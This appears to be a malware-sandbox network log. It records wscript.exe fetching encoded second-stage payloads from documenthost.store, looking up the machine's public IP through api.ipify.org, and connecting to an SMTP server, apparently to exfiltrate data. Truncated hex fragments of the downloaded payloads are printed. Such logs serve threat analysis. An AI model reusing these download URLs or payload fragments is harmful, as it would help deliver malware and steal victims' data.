                                                    Nov 12, 2024 13:40:05.029417038 CET44349709172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.288558006 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288621902 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.288706064 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288980007 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.288996935 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.930186033 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.930252075 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.961549044 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:05.961604118 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.961872101 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:05.979307890 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.027329922 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382245064 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382287025 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382311106 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382347107 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382380962 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382400036 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382462025 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382462025 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382754087 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382771015 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:40:06.382787943 CET49712443192.168.2.5172.67.215.48
                                                    Nov 12, 2024 13:40:06.382792950 CET44349712172.67.215.48192.168.2.5
                                                    Nov 12, 2024 13:41:09.504411936 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.504451036 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:09.504549026 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.526463032 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:09.526488066 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.167783022 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.167850971 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.170207977 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.170219898 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.170456886 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.215429068 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.248986006 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.295341969 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.426990032 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.427061081 CET44349981104.26.12.205192.168.2.5
                                                    Nov 12, 2024 13:41:10.427212000 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:10.435894012 CET49981443192.168.2.5104.26.12.205
                                                    Nov 12, 2024 13:41:11.652475119 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:11.658385038 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:11.658462048 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.449523926 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.449799061 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.455122948 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.609038115 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.609981060 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.615017891 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.769959927 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.770906925 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.775801897 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.947962046 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:12.948215961 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:12.953165054 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.107741117 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.110208035 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.115219116 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.271050930 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.274245024 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.279223919 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.433584929 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.436835051 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436878920 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436908007 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.436924934 CET49983587192.168.2.5162.254.34.31
                                                    Nov 12, 2024 13:41:13.441798925 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441808939 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441896915 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.441906929 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.600332022 CET58749983162.254.34.31192.168.2.5
                                                    Nov 12, 2024 13:41:13.653059006 CET49983587192.168.2.5162.254.34.31
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 12, 2024 13:39:47.388715029 CET5920053192.168.2.51.1.1.1
                                                    Nov 12, 2024 13:39:47.441085100 CET53592001.1.1.1192.168.2.5
                                                    Nov 12, 2024 13:41:09.464888096 CET5532153192.168.2.51.1.1.1
                                                    Nov 12, 2024 13:41:09.471939087 CET53553211.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 12, 2024 13:39:47.388715029 CET192.168.2.51.1.1.10xb996Standard query (0)documenthost.storeA (IP address)IN (0x0001)false
                                                    Nov 12, 2024 13:41:09.464888096 CET192.168.2.51.1.1.10x8d2dStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 12, 2024 13:39:47.441085100 CET1.1.1.1192.168.2.50xb996No error (0)documenthost.store172.67.215.48A (IP address)IN (0x0001)false
                                                    Nov 12, 2024 13:39:47.441085100 CET1.1.1.1192.168.2.50xb996No error (0)documenthost.store104.21.45.141A (IP address)IN (0x0001)false
                                                    Nov 12, 2024 13:41:09.471939087 CET1.1.1.1192.168.2.50x8d2dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                    Nov 12, 2024 13:41:09.471939087 CET1.1.1.1192.168.2.50x8d2dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                    Nov 12, 2024 13:41:09.471939087 CET1.1.1.1192.168.2.50x8d2dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                    • documenthost.store
                                                    • api.ipify.org
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549704172.67.215.484437252C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:39:48 UTC158OUTGET /2910/s HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:48 UTC817INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:48 GMT
                                                    Content-Length: 27312
                                                    Connection: close
                                                    Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
                                                    ETag: "6ab0-6237452d358f3"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=72rmsUZ72JBQbM3383%2F8QxxTQQPzOBIzAyqq54QNo4EjzJu08hmUQ9EAe2n8PnEtYsRdxiE%2BEJmmCiJkc6DF3G0%2FcW2xRkrM1y2p5uU0lIYwc8bMvy7p7ugNl59YpPOuN7pRGF0%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e16963e2a547d57-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=772&delivery_rate=2656880&cwnd=251&unsent_bytes=0&cid=ac80482f3b709666&ts=455&x=0"
                                                    2024-11-12 12:39:48 UTC552INData Raw: 33 44 33 44 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 3D3D41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 39 34 44 36 41 36 34 37 35 33 30 33 32 36 33 36 38 37 30 35 34 36 32 37 36 34 45 35 37 34 43 33 30 35 41 33 32 36 32 37 41 33 39 36 44 36 33 36 41 36 43 35 37 36 32 37 34 34 44 35 38 35 39 37 34 35 36 34 37 36 31 36 41 34 45 36 45 34 46 37 35 34 41 35 38 36 34 36 39 33 30 37 41 36 33 37 35 37 38 35 37 36 32 33 34 34 32 37 39 36 33 36 43 36 34 35 37 35 41 37 33 36 43 36 44 36 34 37 30 34 41 34 38 35 35 36 42 35 36 34 37 36 34 37 41 35 36 35 37 36 34 37 38 35 36 36 44 36 33 33 38 34 31 34 33 34 39 36 37 34 31 34 33 34 39 36 37 36 46 35 31 34 34 32 42 36 42 34 38 36 34 37 30 34 41 35 38 36 34 36 41 35 36 33 32 36 33 33 38 34 31 34 33 34 39 36 37 34 31 36 39 34 33 34 45 33 34 36 41 34 39 37 39 35 39 36 45 34 43 37 34 34 45 35 38 35 39 33 36 33 30 33 32 36 32
                                                    Data Ascii: 94D6A647530326368705462764E574C305A32627A396D636A6C5762744D5859745647616A4E6E4F754A586469307A6375785762344279636C64575A736C6D64704A48556B5647647A56576478566D633841434967414349676F51442B6B4864704A58646A56326338414349674169434E346A4979596E4C744E585936303262
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 32 37 37 36 32 34 31 34 39 34 38 34 31 35 31 34 32 35 31 34 31 34 31 33 34 34 31 34 31 33 38 34 31 34 31 34 31 34 31 35 35 34 37 34 31 33 34 34 32 35 31 35 41 34 31 33 34 34 33 34 31 33 30 34 31 36 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34 31 34 33 34 32 34 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35 39 34 31 33 34 34 37 34 31 36 43 34 32 34 31 36 32 34 31 36 42 34 37 34 31 34 37 34 32 34 31 36 32 34 31 34 35 34 37 34 31 37 35 34 32 35 31 36 31 34 31 36 33 34 37 34 31 37 30 34 32 36 37 36 33 34 31 33 38 34 35 34 31 34 32 34 31 36 37 34 35 34 31 37 37 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 42776241494841514251414134414138414141415547413442515A413443413041674D414144417941414D414544417941414D415147417342516141554841434241414155474174425159413447416C424162416B4741474241624145474175425161416347417042676341384541424167454177454141414141414141414
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 31 34 43 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 35 34 32 37 37 36 32 34 31 36 42 34 37 34 31 33 30 34 32 35 31 35 39 34 31 37 37 34 37 34 31 37 41 34 32 36 37 36 32 34 31 34 35 34 37 34 31 37 39 34 32 34 31 35 36 34 31 34 31 34 31 34 31 34 35 34 31 34 31 34 41 34 31 34 31 34 31 34 31 34 31 34 31 37 37 36 32 34 31 35 39 34 37 34 31 37 35 34 32 35 31 35 33 34 31 35 35 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 39 34 35 34 31 37 39 34 32 35 31 35 39 34 31 35 39 34 36 34 31 34 32 34 31 34 31 34 31 34 31 35 31 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 37 35 30 34 31
                                                    Data Ascii: 14C41414141414141414175427762416B474130425159417747417A4267624145474179424156414141414541414A414141414141776241594741754251534155474173425161415945417942515941594641424141414151454141414141414141414141414141414141414151414141414145414141414141414141775041
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 35 35 38 33 30 34 39 34 34 34 44 37 39 34 31 35 34 34 44 37 39 34 31 34 34 35 41 37 33 36 43 35 37 36 34 34 33 37 38 34 36 36 33 37 36 35 32 33 33 36 31 37 41 35 36 34 37 35 32 36 33 33 35 35 37 36 31 37 34 35 32 35 37 35 39 36 33 34 45 36 45 36 33 36 43 34 45 35 38 35 36 36 33 37 30 37 41 35 31 34 31 34 31 34 31 34 31 34 32 34 39 34 38 35 39 36 46 35 32 36 45 35 30 33 35 36 32 37 32 36 39 34 38 35 32 35 37 36 37 34 38 34 34 36 46 37 36 34 31 34 31 37 37 35 35 34 35 34 45 36 43 35 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 36 35 34 31 35 30 34 31 34 31 37
                                                    Data Ascii: 45583049444D7941544D7941445A736C576443784663765233617A5647526335576174525759634E6E636C4E585663707A5141414141424948596F526E50356272694852576748446F7641417755454E6C554141414141414141414141414141414141414141514141414141414141414141414141414141414165415041417
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 37 35 41 34 38 35 36 34 37 36 32 37 30 35 41 35 35 35 41 37 33 36 34 36 44 36 32 37 30 34 45 33 31 36 33 36 45 33 35 35 37 36 31 33 30 35 32 35 38 35 41 35 34 33 35 36 39 36 33 36 43 33 35 33 32 35 41 37 30 34 45 35 38 35 41 34 35 34 45 33 33 35 41 37 35 36 43 34 37 36 34 33 30 35 36 33 32 35 35 37 35 34 44 36 45 36 33 37 36 35 32 35 38 36 31 36 42 35 36 36 42 34 43 37 36 36 43 34 37 35 41 33 31 35 32 33 33 35 35 37 33 34 36 35 37 36 34 37 41 36 43 36 44 35 36 37 35 35 31 36 45 35 41 37 36 34 45 33 33 36 32 37 39 34 45 35 37 36 31 34 45 37 34 34 35 34 31 34 32 36 42 34 36 34 31 34 31 34 31 36 41 34 43 37 37 33 34 34 33 34 44 37 35 36 33 35 34 34 44 34 39 34 39 35 38 35 41 36 42 37 38 35 37 36 31 33 31 34 41 35 35 35 41 36 41 34 41 35 38 36 34 37 36 34 45
                                                    Data Ascii: 75A48564762705A555A73646D62704E31636E3557613052585A543569636C35325A704E585A454E335A756C476430563255754D6E63765258616B566B4C766C475A31523355734657647A6C6D5675516E5A764E3362794E57614E744541426B464141416A4C7734434D7563544D4949585A6B785761314A555A6A4A5864764E
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 31 34 35 36 37 36 37 34 35 34 31 34 31 34 31 34 32 34 44 34 39 34 32 34 31 34 31 35 31 34 31 34 37 35 33 35 39 37 37 34 31 34 32 34 33 36 46 34 35 34 37 35 31 35 31 36 36 35 33 35 39 37 37 34 31 36 42 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 35 31 35 39 35 33 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 38 36 37 36 37 34 35 34 32 36 37 36 39 34 35 35 36 35 39 37 37 34 32 34 44 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 36 37 34 46 34 42 35 35 36 34 34 35 32 46 33 39 33 31 35 30 37 37 36 39 35 31 36 39 36 37 35 34 35 34 34 37 35 37 37 38 36 43 36 35 33 33 36 39 34 31 34 31 35 34 34 35 36 37 34 33 34 35 34 31 37 37 34 35 34 33 34 31 37 37 34 35 34 37 34 44 34 31 34 31 35 34 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 33 34 31 37
                                                    Data Ascii: 4145676745414141424D494241415141475359774142436F4547515166535977416B4952416F495246476351595345414B535568424867674542676945565977424D4952416F4952464763674F4B5564452F393150776951696754544757786C6533694141544567434541774543417745474D41415445414B5355684243417
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 31 33 36 34 31 34 31 34 39 34 31 35 35 34 37 34 31 37 39 34 32 34 31 36 34 34 31 34 44 34 38 34 31 37 30 34 32 37 37 35 41 34 31 35 35 34 37 34 31 37 39 34 32 34 31 34 39 34 31 35 35 34 37 34 31 36 42 34 32 34 31 34 39 34 31 36 42 34 46 34 31 37 33 34 32 37 37 35 39 34 31 34 31 34 33 34 31 36 38 34 32 34 31 36 32 34 31 34 31 34 33 34 31 36 43 34 32 34 31 35 41 34 31 34 31 34 33 34 31 36 43 34 32 36 37 36 33 34 31 35 35 34 38 34 31 33 30 34 32 37 37 35 39 34 31 35 35 34 37 34 31 37 33 34 32 34 31 34 39 34 31 34 35 34 37 34 31 37 33 34 32 34 31 34 39 34 31 35 35 34 37 34 31 36 42 34 32 34 31 34 39 34 31 34 44 34 38 34 31 37 39 34 32 37 37 36 32 34 31 37 37 34 37 34 31 36 37 34 31 36 37 36 33 34 31 35 35 34 38 34 31 36 43 34 32 36 37 36 33 34 31 34 39 34 38
                                                    Data Ascii: 1364141494155474179424164414D48417042775A4155474179424149415547416B424149416B4F41734277594141434168424162414143416C42415A414143416C426763415548413042775941554741734241494145474173424149415547416B424149414D4841794277624177474167416763415548416C426763414948
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 36 42 35 38 35 34 37 35 34 39 34 37 34 31 37 41 35 36 33 32 35 39 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 33 30 35 37 35 41 33 30 34 45 35 38 36 35 35 34 34 32 37 37 36 33 36 43 34 45 35 37 36 31 33 32 34 41 35 38 35 41 35 34 34 41 35 38 35 41 37 33 36 43 34 37 36 33 37 34 33 39 33 32 35 31 37 35 35 35 35 37 36 32 37 30 35 32 36 45 36 32 33 31 34 41 36 43 34 43 37 34 35 36 34 37 36 34 37 41 36 43 33 33 35 35 34 31 34 44 35 38 35 41 36 41 36 43 36 44 36 34 37 39 35 36 33 32 35 35 37 39 35 36 34 37 36 32 37 30 34 32 35 38 36 32 37 36 34 45 36 42 34 43 36 41 36 43 33 32 36 33 36 38 34 41 34 35 36 32 36 38 35 36 33 33 36 33 37 30 35 41 36 43 34 43 33 30 35 41 33 32 36 32 37 41 33 39 36 44 36
                                                    Data Ascii: 795633627A566D55756B5854754947417A563259795633627A566D557530575A304E5865544277636C4E5761324A585A544A585A736C4763743932517555576270526E62314A6C4C745647647A6C3355414D585A6A6C6D64795632557956476270425862764E6B4C6A6C3263684A456268563363705A6C4C305A32627A396D6


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549705172.67.215.484437252C:\Windows\System32\wscript.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-12 12:39:49 UTC158OUTGET /2910/r HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:49 UTC813INHTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:49 GMT
                                                    Content-Length: 38912
                                                    Connection: close
                                                    Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                    ETag: "9800-62404d5968a93"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWpBswhfHBFpgb9qVl1ck9M0CuCBmHoMS0ucF8UmUWGa71n7lCzKOIku0rFzTBZOpKajaOdCjLB7pDKaRfleMFO3tMSihmETxr4OSrr5Lt3NM7SI0ffWPyTgFFSHogqMPK8EpTg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e1696471cd0e786-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=772&delivery_rate=2470989&cwnd=239&unsent_bytes=0&cid=6c3c0bea8d1fc98b&ts=403&x=0"
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                    Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 31 34 30 30 31 30 30 30 38 30 30 30 38 33 30 30 30 30 30 30 30 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 31 33 30 30 30 30 30 30 45 36 30 30 46 36 30 30 39 36 30 30 33 37 30 30 32 37 30 30 35 36 30 30 36 35 30 30 34 37 30 30 33 36 30 30 35 37 30 30 34 36 30 30 46 36 30 30 32 37 30 30 30 35 30 30 31 30 30 30 38 30 30 30 34 33 30 30 30 30 30 30 34 33 30 30 32 33 30 30 30 33 30 30 31 33 30 30 39 33 30 30 30 33 30 30 34 36 30 30 43 36 30 30 39 36 30 30 35 37 30 30 32 34 30 30 30 30 30 30 30 30 30 30 35 36 30 30 44 36 30 30 31 36 30 30 45 34 30 30 34 37 30 30 33 36 30 30 35 37 30 30 34 36 30 30 46 36 30 30 32 37 30 30 30 35 30 30 31 30 30 30 43 30 30 30 38 33 30 30 30 30 30 30 43 36 30 30 43 36 30 30 34 36 30 30 45 32 30 30 34 33
                                                    Data Ascii: 0140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F6002700050010008000430000004300230003001300930003004600C600960057002400000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E20043
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 30 30 32 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 46 33 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 30 30 30 30 30 45 46 46 45 34 30 44 42 30 30 30 30 30 30 30 30 30 30 46 34 30 30 36 34 30 30 45 34 30 30 39 34 30 30 46 35 30 30 45 34 30 30 46 34 30 30 39 34 30 30 33 35 30 30 32 35 30 30 35 34 30 30 36 35 30 30 46 35 30 30 33 35 30 30 36 35 30 30 30 30 30 30 34 33 33 30 43 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 43 32 30 30 30 30 30 38 38 35 30 30 30 30 30 30 38 34 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 33 30 30 30 30 30 30 31 30 30
                                                    Data Ascii: 0000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 32 39 37 44 34 42 30 30 30 31 30 30 31 30 30 30 30 33 37 35 36 33 36 39 36 36 37 32 37 35 36 33 35 32 36 35 36 37 35 45 32 39 37 44 34 45 30 30 30 31 30 33 31 30 30 30 30 32 37 35 36 33 37 35 35 45 32 39 37 44 34 37 30 30 30 31 30 43 30 30 30 30 30 45 36 46 36 39 36 34 37 31 36 33 36 39 36 43 36 30 37 30 37 31 34 45 32 39 37 44 34 45 30 30 30 31 30 33 31 30 30 30 30 32 37 35 36 34 37 35 37 30 37 44 36 46 36 33 34 45 32 39 37 44 34 42 30 30 30 31 30 30 31 30 30 30 30 30 30 46 35 46 35 35 36 33 36 45 36 31 36 34 37 33 37 45 36 39 34 46 35 46 35 35 36 33 37 46 36 30 37 33 37 39 36 34 34 33 31 46 35 46 35 35 36 33 36 45 36 31 36 34 37 33 37 45 36 39 34 46 35 46 35 35 36 34 37 31 36 35 36 32 37 33 34 32 31 43 36 46 36 33 36 46 36 34 37 46 36 32 37 30 35 34 37
                                                    Data Ascii: 297D4B000100100003756369667275635265675E297D4E0001031000027563755E297D4700010C00000E6F69647163696C6070714E297D4E000103100002756475707D6F634E297D4B0001001000000F5F55636E6164737E694F5F55637F60737964431F5F55636E6164737E694F5F556471656273421C6F636F647F6270547
